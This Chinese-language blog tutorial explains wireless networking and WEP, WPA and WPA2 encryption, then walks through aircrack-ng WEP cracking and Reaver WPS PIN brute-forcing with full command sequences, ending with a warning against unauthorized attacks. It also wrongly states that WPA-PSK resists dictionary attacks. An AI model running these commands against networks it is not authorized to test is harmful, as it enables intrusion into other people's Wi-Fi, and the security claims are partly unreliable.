[渗透测试]—6.1 无线网络基础知识

在本章节中,我们将学习一些关于无线网络的基础知识,如WEP、WPA和WPA2等加密技术。我们将尽量讲解得详细、通俗易懂,并提供尽可能多的实例。

6.1 无线网络基础

无线局域网(WLAN)是一种基于无线电波传输的计算机网络,可以实现设备之间的通信和互联。在家庭、企业和公共场所,无线网络已经成为一种主流的网络接入方式。

无线网络的主要标准是IEEE 802.11,它定义了一系列的物理层和数据链路层协议。目前,最常用的802.11标准有802.11a、802.11b、802.11g、802.11n和802.11ac等。

无线网络通常由一个或多个无线接入点(AP)和多个无线客户端组成。客户端通过无线接入点连接到有线网络,实现互联网访问或局域网通信。

6.2 无线网络加密技术

为了防止未授权设备连接无线网络和窃听网络通信,无线网络通常采用一定的加密技术。目前,主要的无线网络加密技术有WEP、WPA和WPA2等。

6.2.1 WEP

有线等效保密(WEP)是IEEE 802.11标准最早的加密技术,旨在提供与有线网络相当的安全性。然而,由于设计缺陷和漏洞,WEP已经被证明是不安全的,不再建议使用。

WEP采用RC4流加密算法,支持40位和104位的密钥长度。在实际使用中,WEP密钥通常以16进制或ASCII字符串的形式输入。例如,一个40位的WEP密钥可以是1234567890(16进制)或ABCDE(ASCII)。

6.2.2 WPA

Wi-Fi受保护访问(WPA)是一种替代WEP的加密技术,可以提供更高的安全性。WPA采用临时密钥完整性协议(TKIP)和预共享密钥(PSK)认证,可以防止字典攻击、重放攻击等威胁。

WPA的密钥通常是一个8至63个字符的字符串,可以包含字母、数字和标点符号。与WEP相比,WPA的密钥更长、更复杂,难以破解。

6.2.3 WPA2

WPA2是WPA的升级版本,采用高级加密标准(AES)和可扩展认证协议(EAP)等技术,可以提供更高的安全性。目前,WPA2已经成为无线网络加密的行业标准,建议在大多数场景中使用。

WPA2的密钥通常与WPA相同,也是一个8至63个字符的字符串。WPA2的加密强度更高,更难以破解。

6.3 无线网络渗透测试工具和技术

在本节中,我们将介绍一些常用的无线网络渗透测试工具和技术,如Aircrack-ng、Reaver等。我们将尽量讲解得详细、通俗易懂,并提供尽可能多的实例。

6.3.1 Aircrack-ng

Aircrack-ng是一款开源的无线网络安全套件,包含了一系列用于监控、攻击、测试和破解无线网络的工具。它可以用于对WEP和WPA/WPA2-PSK密钥进行破解。

以下是使用Aircrack-ng进行WEP密钥破解的一个简单示例:

  1. 首先,启用无线网卡的监听模式:
airmon-ng start wlan0
  1. 使用airodump-ng扫描周围的无线网络:
airodump-ng wlan0mon
  1. 开始捕获目标网络的数据包:
airodump-ng -c [channel] --bssid [BSSID] -w [output_file] wlan0mon
  1. 使用aireplay-ng进行ARP请求重注(可选,加速数据包收集):
aireplay-ng -3 -b [BSSID] -h [client_MAC] wlan0mon
  1. 当收集到足够数量的数据包后,使用aircrack-ng破解WEP密钥:
aircrack-ng [output_file]-01.cap

6.3.2 Reaver

Reaver是一款用于破解WPA/WPA2-PSK密钥的工具,基于Wi-Fi保护设置(WPS)漏洞进行攻击。WPS是一种简化无线网络配置的技术,但存在一定的安全风险。

以下是使用Reaver进行WPA/WPA2-PSK密钥破解的一个简单示例:

  1. 首先,启用无线网卡的监听模式:
airmon-ng start wlan0
  1. 使用wash扫描支持WPS的无线网络:
wash -i wlan0mon
  1. 使用Reaver尝试破解目标网络的WPA/WPA2-PSK密钥:
reaver -i wlan0mon -b [BSSID] -vv

Reaver会尝试暴力破解目标网络的WPS PIN码,从而获取WPA/WPA2-PSK密钥。这个过程可能需要几个小时甚至更长时间。

6.4 小结

在本章节中,我们学习了无线网络的基础知识,包括IEEE 802.11标准、加密技术(WEP、WPA、WPA2)和渗透测试工具(Aircrack-ng、Reaver)。通过实际示例,我们了解了如何使用这些工具进行无线网络安全测试和破解。

在进行无线网络渗透测试时,请确保遵守相关法律法规,遵守道德规范,不要对他人的网络进行未经授权的攻击。无线网络安全测试的目的是提高自己的网络安全意识,学习如何防范潜在的威胁。
推荐阅读:

https://mp.weixin.qq.com/s/dV2JzXfgjDdCmWRmE0glDA

https://mp.weixin.qq.com/s/an83QZOWXHqll3SGPYTL5g

file

posted @ 2023-06-28 17:34  博客0214  阅读(110)  评论(0编辑  收藏  举报